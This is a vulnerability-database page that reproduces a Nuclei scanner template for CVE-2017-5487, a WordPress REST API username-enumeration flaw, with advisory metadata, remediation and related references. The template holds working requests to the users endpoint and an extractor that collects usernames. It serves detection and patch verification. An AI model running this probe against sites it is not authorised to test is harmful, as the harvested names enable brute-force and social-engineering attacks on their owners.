Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nucleiProjectDiscoveryNUCLEI:CVE-2017-5487
HistoryJun 10, 2021 - 12:00 a.m.

WordPress Core <4.7.1 - Username Enumeration

2021-06-1000:00:00
ProjectDiscovery
github.com
104
cve
wordpress
enumeration
exploit-db

AI Score

5.1

Confidence

High

EPSS

0.874

Percentile

98.7%

JSON

WordPress Core before 4.7.1 is susceptible to user enumeration because it does not properly restrict listings of post authors via wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API, which allows a remote attacker to obtain sensitive information via a wp-json/wp/v2/users request.

id: CVE-2017-5487

info:
  name: WordPress Core <4.7.1 - Username Enumeration
  author: Manas_Harsh,daffainfo,geeknik,dr0pd34d
  severity: medium
  description: WordPress Core before 4.7.1 is susceptible to user enumeration because it does not properly restrict listings of post authors via wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API, which allows a remote attacker to obtain sensitive information via a wp-json/wp/v2/users request.
  impact: |
    An attacker can easily determine valid usernames, which can lead to targeted attacks such as brute force attacks or social engineering.
  remediation: |
    Update WordPress to version 4.7.1 or later
  reference:
    - https://www.exploit-db.com/exploits/41497
    - https://www.wordfence.com/blog/2016/12/wordfence-blocks-username-harvesting-via-new-rest-api-wp-4-7/
    - https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
    - https://nvd.nist.gov/vuln/detail/CVE-2017-5487
    - http://www.openwall.com/lists/oss-security/2017/01/14/6
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2017-5487
    cwe-id: CWE-200
    epss-score: 0.97179
    epss-percentile: 0.99767
    cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: wordpress
    product: wordpress
    shodan-query: http.component:"WordPress"
  tags: cve,cve2017,wordpress,wp,edb

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/wp/v2/users/"
      - "{{BaseURL}}/?rest_route=/wp/v2/users/"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"id":'
          - '"name":'
          - '"avatar_urls":'
        condition: and

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200

    extractors:
      - type: json
        name: "usernames"
        json:
          - '.[] | .slug'
          - '.[].name'
        part: body
# digest: 4a0a00473045022012362c3e5d6328b56620ca5ba033d652c01140ab49135a379f1fc623d1dabc80022100b3f06e821337ae0f1da2edea5c31e37a8c383e1c92dbec597ea16233f6d6491e:922c64590222798bb761d5b6d8e72950

Related

openvas 3
zdt 1
cve 1
wpvulndb 1
packetstorm 1
wpexploit 1
ubuntucve 1
prion 1
debiancve 1
seebug 1
checkpoint_advisories 1
cvelist 1
osv 1
nvd 1
exploitdb 1
freebsd 1
nessus 14
debian 1
archlinux 1
openvas
openvas
WordPress 'json' User Enumeration Vulnerability
2017-03-03 00:00:00
WordPress < 4.7.1 Multiple Security Vulnerabilities - Linux
2017-01-20 00:00:00
WordPress < 4.7.1 Multiple Security Vulnerabilities - Windows
2017-01-20 00:00:00
zdt
zdt
Wordpress 4.7.1 - Username Enumeration Exploit
2017-03-03 00:00:00
cve
cve
CVE-2017-5487
2017-01-15 02:59:02
wpvulndb
wpvulndb
WordPress 4.7 - User Information Disclosure via REST API
2017-01-11 00:00:00
packetstorm
packetstorm
WordPress Username Enumeration
2017-03-03 00:00:00
wpexploit
wpexploit
WordPress 4.7 - User Information Disclosure via REST API
2017-01-11 00:00:00
ubuntucve
ubuntucve
CVE-2017-5487
2017-01-15 00:00:00
prion
prion
Cross site request forgery (csrf)
2017-01-15 02:59:00
debiancve
debiancve
CVE-2017-5487
2017-01-15 02:59:02
seebug
seebug
Wordpress < 4.7.1 - Username Enumeration (CVE-2017-5487)
2017-03-04 00:00:00
checkpoint_advisories
checkpoint_advisories
WordPress REST API Plugin Information Disclosure (CVE-2017-5487)
2017-09-17 00:00:00
cvelist
cvelist
CVE-2017-5487
2017-01-15 02:00:00
osv
osv
CVE-2017-5487
2017-01-15 02:59:02
nvd
nvd
CVE-2017-5487
2017-01-15 02:59:02
exploitdb
exploitdb
WordPress Core &lt; 4.7.1 - Username Enumeration
2017-03-03 00:00:00
freebsd
freebsd
wordpress -- multiple vulnerabilities
2017-01-11 00:00:00
nessus
nessus
FreeBSD : wordpress -- multiple vulnerabilities (b180d1fb-dac6-11e6-ae1b-002590263bf5)
2017-01-16 00:00:00
WordPress < 4.7.1 Multiple Vulnerabilities
2017-01-17 00:00:00
WordPress 4.7.x < 4.7.1 Multiple Vulnerabilities
2018-11-05 00:00:00
debian
debian
[BSA-114] Security update for wordpress
2017-01-23 07:39:04
archlinux
archlinux
[ASA-201701-22] wordpress: multiple issues
2017-01-15 00:00:00

AI Score

5.1

Confidence

High

EPSS

0.874

Percentile

98.7%

JSON
Related for NUCLEI:CVE-2017-5487
openvas3zdt1cve1wpvulndb1packetstorm1wpexploit1ubuntucve1prion1debiancve1seebug1checkpoint_advisories1cvelist1osv1nvd1exploitdb1freebsd1nessus14debian1archlinux1